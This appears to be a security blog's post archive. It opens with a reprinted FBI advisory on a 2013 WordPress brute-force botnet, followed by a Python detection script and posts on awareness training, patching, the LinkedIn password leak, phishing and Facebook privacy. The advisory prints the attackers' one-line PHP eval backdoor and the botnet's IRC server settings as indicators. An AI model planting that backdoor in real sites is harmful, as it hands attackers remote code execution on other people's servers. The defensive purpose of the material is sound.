Massive WordPress Brute-Force Botnet Attack

SUMMARY
As of April 9, 2013, multiple web hosting companies began seeing brute force, dictionary attacks against their WordPress Content Management System. Approximately 140,000 IPs have been seen attacking these systems. After successful login, the actors are installing several PHP scripts which execute shell commands, download files from www.marinabybloshotel.com that establish connections with an IRC server and can be used to conduct a variety of different attacks. The actors are also uploading a malicious process “ssh” (created by 3proxy.ru) into “public_html”.

TECHNICAL DETAILS
The compromised WordPress systems are being managed from an IRC server. Information on IRC server:

fakeproc = "/usr/sbin/httpd";
ircserver = "58.221.92.242";
ircport = "21333";
nickname = "UpBot-V5[".int(rand(100))."]";
nickname = "PhP[".int(rand(100))."]";
channel = "#up"
channel = "#bots"

The actors are also injecting the following code into index.php in the “public_html” directory of the WordPress install, giving them arbitrary code execution:

<?php if(isset(($_POST[02f6cf])){eval(stripslashes($_POST[c]));exit;}; ?>

The eval statement contained a “wget” to www.marinabybloshotel.com.

The md5 of the ssh binary is 52977b21b54237be5f9ac1d5fb641c53.

Web hosting companies can search in web logs and in file systems to see if they are impacted by this attack.
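The two checks the advisory suggests, written out as an added example (not part of the FBI notice): flag sources that hammer wp-login.php with POSTs, and scan a webroot for the eval backdoor, the download host, and the md5 of the uploaded “ssh” binary. It assumes Apache combined-format logs and a threshold of 20 login POSTs per five-minute window; the sample log lines are constructed.

```python
import hashlib
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from pathlib import Path

# Apache "combined" log format is assumed (the advisory does not name one).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Indicators taken from the advisory text above.
SSH_BINARY_MD5 = "52977b21b54237be5f9ac1d5fb641c53"
DOWNLOAD_HOST = "marinabybloshotel.com"
BACKDOOR_RE = re.compile(r"eval\s*\(\s*stripslashes\s*\(\s*\$_POST\[")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def find_bruteforcers(lines, threshold=20, window=timedelta(minutes=5)):
    """Return {ip: total_posts} for every source that POSTed to wp-login.php
    at least `threshold` times inside some sliding window of length `window`.
    Threshold and window are assumed values; tune them to your own traffic."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].startswith("/wp-login.php"):
            posts[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in posts.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(stamps)
                break
    return flagged


def classify_file(name, data):
    """Return the list of advisory indicators that a file's contents match."""
    hits = []
    if hashlib.md5(data).hexdigest() == SSH_BINARY_MD5:
        hits.append("ssh binary md5")
    if name.endswith(".php"):
        text = data.decode("utf-8", "replace")
        if BACKDOOR_RE.search(text):
            hits.append("eval backdoor")
        if DOWNLOAD_HOST in text:
            hits.append("download host")
    return hits


def scan_webroot(root):
    """Walk a directory (e.g. public_html) and report files matching any indicator."""
    results = []
    for p in Path(root).rglob("*"):
        if p.is_file():
            hits = classify_file(p.name, p.read_bytes())
            if hits:
                results.append((str(p), hits))
    return results


def sample_log():
    """Constructed sample lines using documentation IP ranges; not real traffic."""
    base = datetime(2013, 4, 9, 10, 0, 0, tzinfo=timezone.utc)

    def line(ip, ts, method, path, status):
        return (f'{ip} - - [{ts.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" '
                f'{status} 1234 "-" "Mozilla/5.0"')

    lines = [line("192.0.2.9", base, "GET", "/", 200)]
    # 25 login attempts in 100 seconds from one source: the pattern to flag.
    for i in range(25):
        lines.append(line("203.0.113.5", base + timedelta(seconds=4 * i),
                          "POST", "/wp-login.php", 200))
    # Three attempts an hour apart from another source: ordinary behaviour.
    for i in range(3):
        lines.append(line("198.51.100.7", base + timedelta(hours=i),
                          "POST", "/wp-login.php", 302))
    return lines


if __name__ == "__main__":
    print(find_bruteforcers(sample_log()))
    print(scan_webroot("."))
```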

Source: Federal Bureau of Investigation (FBI)

Security Awareness – Hold The Line

Yesterday began like all others, a good morning to my Twitter followers and a quick scan through the topics of others I follow. The topic of discussion that stood out, one that divides our industry more often than any other, got started: the belief, or lack thereof, in Security Awareness Training Programs being a benefit to organizations. The sides step back, stand in their respective corners, the bell rings, and both sides come out swinging. The first round went to Bruce Schneier, @DarkReading, with his article entitled “On Security Awareness Training – The focus on training obscures the failures of security design”, and then the fire built inside and the opposing side came back, not only stronger, but direct. Dave Kennedy, @dave_rel1k, the founder of TrustedSec, @TrustedSec, and co-founder of DerbyCon, @DerbyCon, came back with an argument in direct contradiction to Bruce’s statements in his blog post entitled “The Debate on Security Education and Awareness”. Along with Dave, Ben Mauch, @Ben0xA, wrote “Security Awareness Education”, where he references his talk from the 2012 DerbyCon security conference, “Creating a Powerful User Defense Against Attackers”, in which he describes user education and the pitfalls many educators fall into when trying to build these awareness programs.

Under our code of full disclosure, I will say that my respect for Bruce is very high, not only as a security practitioner but as a writer; Dave is a dear friend and is absolutely dedicated to our craft; and Ben is another person I highly respect and consider a friend. However, none of my opinions regarding the topic of user awareness or education are being swayed in any direction because of friendships or respect for any single person. My words here come strictly from experience with training people in numerous different industries. I have trained on topics ranging greatly, but the one thing that has stayed constant has been the people’s reactions and responses to the experience, the final evaluations, and personal observations from interacting with people during these training sessions. That being said, let’s get to why I believe that there is error in Bruce’s article…

I could go back and rehash the points made by Dave and Ben, which are spot on, but what does this serve to better our community or the topic at hand? Let’s look at training in general. I have found that if you throw material at a group of people who have no stake in the game, whether it is Information Security or Nuclear, Biological, or Chemical warfare, the end result is still the same. Some will pick up a little, retain even less, and after a few months their ability to recall the information is virtually gone. Humans in general can only retain so much information in a given time frame, and if the case is not made that this information is just as important to them personally, it will most likely be put into a small data store tucked away in a deep dark corner of their brain. Due to this I have to sit back and look at both sides of this fence and try to calculate where Bruce fell short in his article. I do believe that Security Awareness Training as we know it, as it stands across the board, in the majority of organizations, has failed and failed horribly. That statement being said, one might believe Bruce’s story and run out with the money saved to buy the next “check box” compliant appliance, to fight the onslaught of the Cyber, APT, nation state attack vector because our sales monkey told us that it would prevent this type of attack. Yes, that was a total of three overused buzzwords, so take three drinks! The truth is that every government in the world builds technology into their schema for war, but every person I have ever spoken to regarding warfare has said that HUMINT, Human Intelligence, is what wins the battles. The key here being “Human”: it is the human element, not the technology, that is going to give us the leading edge in this war against the attackers.

As the defending blue team you need to face the fact that you have lost! What’s the old saying, “Admitting you have a problem is the first step” or something like that. So once you have accepted that you lost, what’s left to do? Give up, go home, change career fields, maybe stick your head in a hole? NO, the next step is to figure out how to reduce the impact of an event. Blinking lights, new appliances, and awesome sales pitches from the monkeys are all great; but ultimately they are reaction based solutions. YES, I know these methods do provide some proactive protection, but keep in mind many of these items are found to be misconfigured, misunderstood, or simply don’t do what the monkeys claimed they did. The fact remains that the very first line of defense, in an industry that prides itself on multiple layers of defense, IS the users.

So how do we utilize the assets that we already have?

Utilize these users as our first line of defense, but how?

EDUCATION!

STOP, please STOP, treating users like dumb, mindless morons who couldn’t understand the difference between the flux capacitor and a firewall! People are NOT stupid; uneducated yes, stupid no. If you take the time to develop training around the people, and not around the “check boxes”, you WILL get a return on the investment. For example, why do awareness programs always have to focus on how to handle email attacks in relationship to the XYZ Corporation? Isn’t a phishing attack, at its core, the same as one against a user who is sitting in their home checking their personal email account? The answer is simple, YES! Going back to my original thought for a moment, what does it take to make humans, in our case users, retain and actually learn something from the awareness program? Make it about THEM! EDUCATE the users on how to spot a phishing attack and use their personal email as examples. Explain the implications of such things as the loss of money in their bank account, or how their computer could become a node on a huge botnet, and maybe, just maybe, you will find that these same people will be able to better associate the discussions about the corporate phishing attacks once they can relate that attack to something they see in their personal life. Just maybe, the program’s shortcomings don’t lie with the users but instead with the manner in which the material is structured and delivered.

We all say it over and over, that security must be done in layers. This is done not because a “check box” told us to, or because a sales monkey sold us each layer of the defensive ring and said it would achieve godlike results; it’s being done so that if the first layer fails the second is there to help reduce the risk. The idea is that as the attacker moves from one layer to another, some red flag is raised about the abnormal behavior a device, system, or user account is exhibiting, and it will be seen by admins, security staff, or the key master watching out for the abnormalities that occur. So look at the organizations out there: most are understaffed, overworked, and miss a great deal of things that should have truly been caught. Take a well EDUCATED user base and you have just increased the number of people who are your first line of defense in catching these abnormalities. Will some users fail this task and still allow attackers in? Of course they will; but isn’t that why we have layers? If the first fails, the remaining layers should alert on the activity. On that same mindset of layers, wouldn’t it be beneficial then to have an extra layer to help catch these things? The position Bruce is taking would throw out this layer in favor of a new shiny, blinky light, sales monkey’s appliance or service; we all know how well (or not) these products and services are currently working for us!

So in closing, if your program is failing, you have a great deal of attacks coming from your user base, and you feel that the failure stems from the program, you may be absolutely correct. To say you are throwing the program out in lieu of something else is WRONG! Look at the program and see if the program is “teaching” by throwing material and facts out to the users or is it “educating” the users by relating to them. If you relate to the user and show them how the same methods can protect them in their personal life as it does in their professional life you will see better results. More so you will see a much stronger, better educated, and more aware user base as your first line of defense!

Now go out and EDUCATE people instead of treating them like dumb, mindless, morons, who couldn’t understand the difference between the flux capacitor and a firewall!

SolarWinds Launches PatchZone

Today’s Information Technology (IT) field changes so rapidly that it’s difficult to stay abreast of all the daily, weekly, and monthly tasks we as IT professionals face. One such task is patching the servers and other systems we use on an everyday basis; all while maintaining that critical uptime. Today we are given a new set of tools in our fight; the addition to our collection comes from SolarWinds in the form of a community space by the name of PatchZone. In my previous posts I mention my latest endeavor with SolarWinds as well as my first post “The Patch Management Process: 5 Common Sense Tips”. However, today I would like to share with you the co-bloggers who joined the team; the highly anticipated release of the 3rd party updates section, as well as the company news article released today.

I would like to start off by saying that it is an honor to be writing alongside individuals who are leaders in our field. They have a proven track record of expertise and are always willing to help others learn. Working with such talent in a community such as this will garner not only incredible articles but insight into areas many are not fortunate enough to be a part of during their everyday activities. Please welcome Brien Posey, Augusto Alvarez, and Lawrence Garvin to the team. Feel free to ask any of us questions, or let us know if you have an idea for an article. We are all very excited about the upcoming adventures in patch management!

SolarWinds, and more specifically PatchZone, has a unique offering others have yet to explore. The SolarWinds team has put together a table of 3rd party updates and provided this dynamic spreadsheet to help you know what piece of software is on which version. This is a tremendous resource if you are trying to make sure that the systems you take care of are at the level they need to be, saving hours upon hours of going back and forth between vendor sites gathering the same data on your own. I encourage everyone to take a look, and if there is a piece of software you would like to see on the list, message the team at SolarWinds and they will see what they can do to get it added.

Like all great things in our field there are news releases, and PatchZone is no different. Here is “SolarWinds Launches PatchZone.org to Help IT Pros Patch Microsoft and Third Party Applications”, a company news article. It doesn’t stop there folks; no, the excitement continues as the news about PatchZone picks up, with Reuters, MarketWire, and Investors also sharing the announcement.

In closing, take a minute to head over to PatchZone; read over the articles and forums, and most importantly ask questions or suggest topics you would like to see written. To stay on top of these fast paced developments, take a second to sign up for the PatchZone news and tips newsletter located at the top right hand corner of the community space. It is an outstanding resource for receiving the information, and it still lets you choose which articles best suit your needs while staying current.


The Patch Management Process: 5 Common Sense Tips

Imagine a life where you have thousands of workstations, hundreds of servers, and thousands upon thousands users all over the world. Now imagine you have this environment with a fraction of the staff you truly need to keep everything running properly.

How will you keep your environment up to date?

How will you manage this monster?

You need a rock solid patch management process, but that’s complicated, right? It’s custom, it’s expensive, it’s just not feasible. No, it doesn’t have to be a nightmare, nor custom.

Whether you are managing tens of thousands of systems and users or just a dozen, the process is still the same. I had the pleasure of writing for SolarWinds’ new PatchZone on this topic, “The Patch Management Process: 5 Common Sense Tips”, which you can use as an outline for your environment; small or large, the same logic still works.

If you would like to add to this, or would like help in building your process, feel free to drop me a line and I will be more than happy to incorporate your suggestions or help find solutions to your specific issue.

Turn your nightmare into a pleasurable thing of the past!

Adventures In Patching – My Latest Endeavor

Throughout my career I have had the honor and pleasure to work with some of the greatest minds this world has to offer, but never have the adventures led me down a path like my most recent endeavor. I am happy and excited to announce that I have been asked to join forces with the SolarWinds team in launching a new community driven space within Thwack called Patchzone. Patchzone will provide numerous avenues of information for all levels of experience. There will be a combination of blog postings, whitepapers, webcasts, and news related to patching not only Microsoft products but also 3rd party applications. [Official Release Statement]

Being a huge supporter of the idea that information should be shared and that the experienced should help the beginners, I am thrilled to be a part of this community. All the way through my career I have held the fundamental principle of helping to educate and expand the knowledge pool around us. I believe that the more collective minds you have working on a problem, the greater the number of solutions produced, and the better the best solution for that particular problem; this is no different!

I hope to bring a series of posts which start from what patching does and why patch management is so important; all this while keeping a focus on the security implications and benefits of not only your systems but also the environment in which these systems operate. There will be a sharing of resources, articles, and insight into methods or procedures which I have found to work for me; hoping to help others struggling with patches and patch management along the way.

Please welcome aboard SolarWinds, Thwack, and the entire patchzone.org community!

HashCheck – A Small Piece Of Mind

Yesterday brought a considerable amount of attention, and mayhem, from the LinkedIn password dump. Many security researchers and professionals were trying to gather as much information as possible, while still having the monkey on their back wanting to know if their password was leaked. This onslaught of demand brought forth the good and the bad, but one question which remained the same was the desire to have something which could take their password and compare it against an estimated 6.5 million hashes, and fast. Websites began popping up everywhere, domain registrations grew, but one thing still bothered me…

In order to check your password you must trust that the creator of the website was ethical and not capturing your password to store somewhere else. There were the JavaScript sites, the PHP sites, and even an ASP site; but the fact still remained. You must trust them! Maybe it’s just me, but with a very large data breach, ~6.5 million records released, everyone scrambling for answers, and password crackers everywhere smoking their GPUs in an attempt to get the passwords cracked, it just doesn’t seem logical that I should trust them. Now before anyone goes off screaming that their site wasn’t collecting passwords, I know. Many, and I mean a good number, of the sites I found were legit sites by security professionals with incredible reputations. However, there has to be just one site that wasn’t. There has to be one person, a person who put numerous passwords into the one bad site trying to see if any of their passwords were on the list.

Let’s say five people did five password tries on the one bad guy’s website. Those five people think, great, none of my passwords were in this list. However, they are now, because you just gave them 25 passwords they didn’t have previously. Not only did you give them the hash, you gave them the matching plain text password, saving them the time of cracking the hash themselves!

This brings me to my late night / early morning project. The adventure began, the goal was to write a script so that I could test my passwords while still feeling safe in the fact that I was not giving my information to some website. While hard coding the password was quick, simple, and quite easy; that’s just not my style. I jumped head first, deciding that it should be flexible to take any hash dump, and the user should be able to specify the hash dump filename, and the password. Thus HashCheck was born!

The LinkedIn hashes posed a slight snag in the fact that the first five characters could have been 0’s to pad the length. Currently HashCheck will do the LinkedIn SHA1 hashes, but I will shortly be able to do standard hashes without much trouble; I just need some time to finish writing it. My goal was to just get this out into the public so that people who want to check their passwords can do so without the fear of using a website.

I have included a very small sample of the LinkedIn hashes and included the “password” password hash which was padded with five 0’s as mentioned before. I did this so you could use it as a control sample.

Enjoy, and look for updates! [Someone was playing around with GUIs today, so who knows what might come in the future]

Download the code [ HERE ]
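The check HashCheck performs, as an added example that is not the HashCheck code itself: hash the candidate with SHA-1 and look for it in the dump both intact and with its first five hex digits zeroed, as the post describes for the LinkedIn file. The dump below is constructed (three entries), and the file/argument handling is an assumed interface.

```python
import hashlib
import sys

# Constructed sample dump (not the real LinkedIn file): the SHA-1 of "password"
# with its first five hex digits zeroed, the intact SHA-1 of "123456", and one
# made-up entry that matches nothing.
SAMPLE_DUMP = """\
000001e4c9b93f3f0682250b6cf8331b7ee68fd8
7c4a8d09ca3762af61e59520943dc26494f8941b
00000123456789abcdef0123456789abcdef0123
"""

HEX = set("0123456789abcdef")


def sha1_hex(password):
    """SHA-1 of the UTF-8 password as lowercase hex, the form used in the dump."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def load_dump(text):
    """Parse dump text into a set of 40-hex-digit entries, skipping junk lines."""
    entries = set()
    for raw in text.splitlines():
        h = raw.strip().lower()
        if len(h) == 40 and set(h) <= HEX:
            entries.add(h)
    return entries


def load_dump_file(path):
    """Read a dump file from disk (assumed one hash per line)."""
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        return load_dump(f.read())


def check_password(password, entries):
    """Return 'intact' if the full SHA-1 is in the dump, 'zeroed' if only the
    form with the first five hex digits replaced by 0s is present, else None.
    The password never leaves this process, which is the whole point."""
    digest = sha1_hex(password)
    if digest in entries:
        return "intact"
    if "00000" + digest[5:] in entries:
        return "zeroed"
    return None


if __name__ == "__main__":
    # Usage: hashcheck.py [dumpfile] password  (falls back to the sample dump)
    entries = load_dump_file(sys.argv[1]) if len(sys.argv) > 2 else load_dump(SAMPLE_DUMP)
    candidate = sys.argv[-1] if len(sys.argv) > 1 else "password"
    print(check_password(candidate, entries) or "not found")
```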

LinkedIn – 6.5 Million Passwords Exposed

Last night it came to the attention of the security community that the professional networking website, LinkedIn, was breached by a Russian hacker group, when a suspected member posted on a Russian forum stating that an estimated 6.5 million hashed passwords were downloaded from LinkedIn, with 300,000 of those already cracked and dumped to the underground.

The forum post has been down most of the afternoon, however it has come back up for short periods of time.

InsiderPro Forum Post – 6.5kk SHA-1 *** NO LONGER AVAILABLE ***
Google Cache [InsiderPro Forum Post – 6.5kk SHA-1]

According to many sources, LinkedIn is currently looking into the possible breach.

ZDNet – 6.46 million LinkedIn passwords leaked online

Venture Beat – 6.5M hashed LinkedIn passwords reportedly leaked, following app concerns

The Next Web – Bad day for LinkedIn: 6.5 million hashed password reportedly leaked – change yours now

CSO Online – True or not, changing your LinkedIn password is a smart idea

Sophos Blog – Millions of LinkedIn passwords reportedly leaked – take action NOW

Business Insider – Change Your LinkedIn Password Right Now!

According to LinkedIn News posts on their Twitter account, they have yet to confirm or deny the incident:

@LinkedInNews
Our team is currently looking into reports of stolen passwords. Stay tuned for more.

@LinkedInNews
Our team continues to investigate, but at this time, we’re still unable to confirm that any security breach has occurred. Stay tuned here.

If you have a LinkedIn account then change that password NOW!

If you have used the same password on any other website, email account, corporate access, or anywhere for that matter, change those passwords as well.

*** UPDATE 06 June 2012 @ 4:45PM EST ***

@LinkedInNews
New Post: Further Update on LinkedIn Member Passwords Compromised. http://blog.linkedin.com/2012/06/06/linkedin-member-passwords-compromised/

@LinkedInNews
New Post: Updating Your Password on LinkedIn and Other Account Security Best Practices http://blog.linkedin.com/2012/06/06/updating-your-password-on-linkedin-and-other-account-security-best-practices/

I have real concerns with the method by which LinkedIn is going to notify users of the breach, and with how long it has taken them to admit (or not admit) that the breach even occurred. It appears LinkedIn is going to email users the password reset instructions, most likely with a link for the user to click. Then they are going to send a second email with a little more context as to why the change. They did, however, mention that the user shouldn’t follow links provided in emails; yet every email I have ever seen from LinkedIn has links embedded in it. You have programmed users to expect these links, and those who carry out Phishing attacks have now just been advised of the number of emails and the general context of each. You, LinkedIn, have just provided the greatest opportunity for a Phishing scam to further compromise your users.

I have already received at least one phishing email based on a LinkedIn theme, granted this was an attempt to get me to go to the premium package and the timing was just luck that it arrived right after this. However, this will only increase as time progresses with the emails being more directed and focused on the breach and your password change.

Here is the email I received with the links removed for obvious reasons:

Upgrade to LinkedIn Premium
free for 1 month

Hi Robert,

Thank you for being a valuable LinkedIn member. As a special gift, we’d like to offer you a 1- month free upgrade to LinkedIn Premium. Unlock the real power of your network – start today!

• Who’s Viewed Your Profile — see the full list.
• Contact anyone on LinkedIn with InMail messages, even people outside your network.
• View full profiles of all 150 million LinkedIn members, not just people in your network.
• Search better with premium filters and 7x more results in every search.

Your exclusive offer expires soon, so get started today!
Get LinkedIn Premium – FREE for 1 month!

Sincerely,
The LinkedIn Premium Team

*Terms and conditions

Promotional offer may be applied only towards a new LinkedIn Premium Business, Business Plus or Executive account. Valid only for new subscribers. Subscribers are responsible for any amount that exceeds the promotional credit offer. Subject to LinkedIn terms of usage. The promotional credit is not transferable and may not be sold or bartered. Offer may be revoked at any time, for any reason by LinkedIn, Inc. One promotional offer per eligible subscriber. Void where prohibited or restricted by law. Expires June 15 2012. LinkedIn Premium services are sold on a subscription basis and are automatically charged to your credit card at the beginning of each subscription period. Discount applies to the first month of a LinkedIn Premium account subscription. After this period, you will be charged the standard rate on your renewal date unless or until you cancel your LinkedIn Premium account.
If you need assistance or have questions, please contact LinkedIn Customer Service.

If you prefer not to receive these messages, unsubscribe.

To ensure you receive our emails in your inbox, add [email protected] to your address book.
©2012 LinkedIn Corporation, Inc. LinkedIn, the LinkedIn logo, and InMail are registered trademarks of LinkedIn Corporation in the United States and/or other countries. All rights reserved. LinkedIn Corporation, Inc. 2029 Stierlin Ct., Mountain View, CA 94043 USA

*** UPDATE 07 June 2012 @ 4:50PM EST ***

Added the Google cache link to the InsiderPro Forum thread
Noted that the InsiderPro Forum thread was no longer active

Travel – Getting More Than Just Frequent Flyer Miles

In the past, security professionals all across the world have spoken out regarding the hazards of using open wireless networks at a hotel while traveling. Yet the message still falls short, because many people still use these networks without regard to the dangers they potentially face.

Just as others have mentioned in the past, I am going to restate the fact that any open network should be considered hostile!

Take the appropriate measures to protect your computer from these potentially dangerous networks. Try to use a combination of several safety precautions, such as:
* a VPN connection;
* an inbound and outbound firewall;
* monitoring system performance before traveling and then again while traveling, looking for differences which might indicate new processes running in the background;
* if possible, one laptop for travel and one for when you are not traveling;
* reloading the operating system when you return from your trip;
* changing your passwords on a different machine as soon as you return;
* avoiding checking your bank or credit card accounts;
* and lastly, avoiding checking email on your laptop; instead, try using your smart phone if possible.
If you travel a great deal, the two-laptop option may not be possible, but it is very effective when combined with the other options. These options are just a small sample of things you can do to help mitigate the hostile networks found while traveling, but every little bit helps!

The news article below was released by the Internet Crime Complaint Center (IC3) on May 5th, 2012 with regard to malware that was installed on travelers’ laptops.

These travelers got more than just frequent flyer miles on this trip!

Malware Installed on Travelers’ Laptops Through Software Updates on Hotel Internet Connections

Recent analysis from the FBI and other government agencies demonstrates that malicious actors are targeting travelers abroad through pop-up windows while establishing an Internet connection in their hotel rooms.

Recently, there have been instances of travelers’ laptops being infected with malicious software while using hotel Internet connections. In these instances, the traveler was attempting to set up the hotel room Internet connection and was presented with a pop-up window notifying the user to update a widely-used software product. If the user clicked to accept and install the update, malicious software was installed on the laptop. The pop-up window appeared to be offering a routine update to a legitimate software product for which updates are frequently available.

The FBI recommends that all government, private industry, and academic personnel who travel abroad take extra caution before updating software products on their hotel Internet connection. Checking the author or digital certificate of any prompted update to see if it corresponds to the software vendor may reveal an attempted attack. The FBI also recommends that travelers perform software updates on laptops immediately before traveling, and that they download software updates directly from the software vendor’s Web site if updates are necessary while abroad.

Anyone who believes they have been a target of this type of attack should immediately contact their local FBI office, and promptly report it to the IC3’s website at www.IC3.gov. The IC3’s complaint database links complaints together to refer them to the appropriate law enforcement agency for case consideration. The complaint information is also used to identify emerging trends and patterns.

Source: IC3 – Intelligence Note

Phishing – Don’t Be That Catch

As the tax season approaches so does the potential for someone to gain access to your computer, whether it is a company computer or your personal computer. Today’s computer criminals are no longer focusing on gaining control of your computer to attack someone else, while that is still a concern it is no longer the main concern. The primary concern in today’s battle against these crimes is your personal and financial information!

Let’s take a second to look at the real risk. How does someone gain this information? There are many vectors, but the primary one is via email. This is commonly referred to as “Phishing”, pronounced the same as “fishing” (FISH-ing), and normally involves an email crafted in such a way that the end recipient would believe it is real, whether that is from a family member, friend, or government agency. This is similar to the methods commonly referred to as SPAM; however, Phishing is targeted to a small group of people and very focused, while SPAM is normally sent out to very large groups of people and most of the time unfocused. Phishing is very dangerous in that it can allow remote control and data leakage of a system with virtually zero detection by the end user.

So why is this bad?

So someone leaks what is stored on your computer; why should I be concerned? Let’s say you use your bank account online: your usernames and passwords can be leaked, as well as any cookies. If a person has your username and password along with your cookies, they could potentially log into your bank at the same time as you, leave their browser open after you close yours, and then transfer the money out of your account into an account somewhere else in the world. Possible, yes; most likely, no. More often than not a criminal is looking for things like your name, address, phone number, social security number, and credit card numbers. These things are called Personally Identifiable Information (PII). This information is then sold on the information black market, which in turn puts it in the hands of people who steal your identity and begin to create a double life posing as you. They get loans, cars, houses; anything you can do they could potentially do, leaving you to hold the bag and clean up the mess!

I am telling you this in hopes of bringing light to the problems we all face. I receive alerts on a regular basis from the United States Computer Emergency Response Team (US-CERT). On February 8th, 2012 I received one such alert related to our upcoming tax season. Please take a moment to think about the above mentioned concerns, and then relate that to the type of information a criminal could gain using a US Taxes Phishing email; also read the information below, and on the US-CERT website, on how to better protect your information against attacks like this. Also share this information with family and friends; the more we know about these items the better protected we all can be!


US-CERT Current Activity

US Tax Season Phishing Scams and Malware Campaigns

Original release date: February 8, 2012 at 11:10 am
Last revised: February 8, 2012 at 11:10 am

In the past, US-CERT has received reports of an increased number of
phishing scams and malware campaigns that take advantage of the United
States tax season. Due to the upcoming tax deadline, US-CERT reminds
users to remain cautious when receiving unsolicited email that could
be part of a potential phishing scam or malware campaign.

These phishing scams and malware campaigns may include, but are not
limited to, the following:
* information that refers to a tax refund,
* warnings about unreported or under-reported income,
* offers to assist in filing for a refund, and
* details about fake e-file websites.

These messages, which may appear to be from the IRS, may ask users to
submit personal information via email or may instruct the user to
follow a link to a website that requests personal information or
contains malicious code.

US-CERT encourages users and administrators to take the following
measures to protect themselves from these types of phishing scams and
malware campaigns:
* Do not follow unsolicited web links in email messages.
* Maintain up-to-date antivirus software.
* Refer to the IRS website related to phishing, email, and bogus
website scams for scam samples and reporting information.
* Refer to the Recognizing and Avoiding Email Scams (pdf) document
for more information on avoiding email scams.
* Refer to the Avoiding Social Engineering and Phishing Attacks
document for more information on social engineering attacks.

Relevant Url(s):
http://www.us-cert.gov/cas/tips/ST04-014.html

http://www.us-cert.gov/reading_room/emailscams_0905.pd

http://www.irs.gov/privacy/article/0,,id=179820,00.html?portlet=5

====
This entry is available at
http://www.us-cert.gov/current/index.html#us_tax_season_phishing_scams1

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iQEVAwUBTzKfWD/GkGVXE7GMAQKPEQf/Q8U+iKgDegdYbiOO9j9qdPZ6CGu0QpVj
f217/DGZG/ji20FRB4kl1RrRb+NqMBgZrYrUbTh0zKc6FiaZyY2wIr+PoHv6SYAr
t86QF2h86QyjCI5JspIfkPSVenOO5nIytgUpeUc0w6e38JlkRAwfPvkhPLKAqk6c
o83t8BYiTh144R4lA7VnPpAOriq2D84bBF8P1qVDWEdQQFK84sDm58tNKnVMBe5K
iULHh+G8mXGzqjYm3TkQgBn3YkxJZq10YhnhEeydpJd0BbbNC/SEqD8Bqkg/k6UO
fVEdUfHaWKile0EU388/uXVkksbjqTursBhEm9jh92Z0W13df0pv9w==
=bzDg
-----END PGP SIGNATURE-----

An investment in knowledge pays the best interest.
~ Benjamin Franklin ~

Facebook – Log In, Post, Look Ignorant

While doing some research, trying to get a better understanding of the "Occupy Movement", I found that nearly every profile associated with a particular city has placed a similar privacy disclaimer on its Facebook profile. I understand the intent is to protect the people who are visiting the profile, posting on the wall, or appearing in the images and pictures put up for everyone to see. However, these people are ultimately making themselves and the "Movement" look completely ignorant.

A profile on Facebook, MySpace, Foursquare, or any other social media website that is viewable by any individual with access to the intertubes is a "public" sphere, which means it is "PUBLIC". You would think this is common sense; however, the opposite is seen over and over when reviewing these profiles.

Here is an example of such a disclaimer:

About Occupy

PRIVACY NOTICE:

Warning: any person and/or institution and/or Agent and/or Agency of any governmental structure including but not limited to the US Federal Government and the UK government also using or monitoring/using this website or any of its associated websites, you do NOT have my permission to utilize any of my profile information nor any of the content contained herein including, but not limited to my photos, and/or the comments made about my photos or any other "picture" art posted on my profile. You are hereby notified that you are strictly prohibited from disclosing, copying, distributing, disseminating, or taking any other action against me with regard to this profile and the contents herein. The foregoing prohibitions also apply to your employee(s), agent(s), student(s) or any personnel under your direction or control. The contents of this profile are private and legally privileged and confidential information, and the violation of my personal privacy is punishable by law.

***** It is recommended that you post a similar notice like this on your profile/page *******

THIS IS A LEGAL BINDING NOTICE – YES GOVERNMENT/BIG BROTHER THAT MEANS THE ABOVE NOTICE APPLIES TO YOU TOO!

Thank you

Reading this, you might think it was written by a lawyer with a great deal of privacy-rights experience, but knowing the law you will see it is simply copied and pasted in an attempt to provide a self-fulfilling belief of being safe when speaking your mind or posting on Facebook.

Let's look at this from outside the box, with a logical approach to Facebook and privacy...

  • If you create a profile which can be seen by anyone with access to the internet, it is PUBLIC.
  • If you speak to a crowd of people on the street, it is PUBLIC.
  • If you do or say anything illegal and post this on your profile, it is ILLEGAL & PUBLIC.
  • If you do or say anything illegal and tell people this on the street, it is ILLEGAL & PUBLIC.
  • If you post a picture on your profile, it is PUBLIC.
  • If you hold up a picture on the street, it is PUBLIC.

So with the small examples above, let's look at what PUBLIC really means:

Per Merriam-Webster, "public" means:

  • of, relating to, or affecting all the people or the whole area of a nation or state <public law>

That definition should explain it; however, let's look at it again. Public means the OPPOSITE of "private", so let's see what "private" means:

  • belonging to or concerning an individual person, company, or interest <a private house>

So, to give the benefit of the doubt to the people posting this, they believe that the "Occupy Movement" is an interest and thus governed by the laws of "private" and "privacy". However, this is not a private space; this is Facebook. Facebook is intended for "public" use and thus is NOT covered by the "privacy" laws that apply under a "private" classification.

Now, with all this said, how can you, as a member of the "Occupy Movement", fail to understand that when you are standing on a street or posting to Facebook you have no right to privacy? When you attempt to protect yourself with something like this, you simply look ignorant and only hurt your so-called cause.

If you believe I am mistaken, please take a moment and think about the EFF, which was started to protect everyone's rights and their privacy. They have fought numerous legal battles for the rights of internet users, so their response to my question about Facebook only proves this point.

Here is the question posed to the EFF:

I have a question regarding items you post on Facebook.  If your
profile is set to allow anyone in the public to view it, and then law
enforcement uses something posted on your site, is this allowed since it
is a public forum, as if you were talking in a public space?  I believe
that since the profile is set for public view you give up any rights to
privacy and in turn cannot protect yourself based on your right to
privacy, even if you put up a disclaimer saying everything on this
